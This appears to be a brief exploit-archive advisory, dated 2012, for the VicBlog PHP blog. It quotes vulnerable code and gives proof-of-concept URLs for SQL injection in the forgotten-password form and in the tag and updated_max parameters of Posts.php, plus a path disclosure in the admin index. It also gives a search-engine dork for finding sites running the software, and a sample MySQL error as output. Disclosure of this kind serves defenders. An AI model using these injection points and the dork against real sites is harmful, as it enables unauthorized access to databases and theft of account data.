VicBlog suffers from path disclosure and remote SQL injection vulnerabilities.
067f350bd0ef6ecc3e6552ba562514f7c815b69e8cec2871fbedccc998dd9782
# Author : Geek
# Title : Vicblog Multiple Vulnerabilities
# Date : 10/25/2012
# Dork : allintext: "Powered by VicBlog"
# Tested On : Winxp
# Multiple Sql Injection
{x} File : password_forgotten
{x} Code :
$email = $_POST['email'] ;
$sql = mysql_query("SELECT * FROM vb_accounts where email = '$email'")
{x} P0c :
domain.tld/index.php?admin=password_forgotten
In Forgotten Password? field put (x')
Snap :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x''' at line 1
{x} File : Posts.php
{x} Code :
$tag = isset($_GET['tag']) ? prepare_input($_GET['tag']) : "";
$updated_max = isset($_GET['updated_max']) ? prepare_input($_GET['updated_max']) : "";
Don't use reverse and post id paramater , cz it check if (int) or not
{x} P0c :
domain.tld/index.php?page=posts${tag or upated_max paramater}=1[SQL]
# Path Disclosure
{x} File : /admin/index.php
{x} Code :
<?php
header("location:../index.php");
exit();
?>
{x} P0c :
domain.tld/index.php?admin=index
# End Of File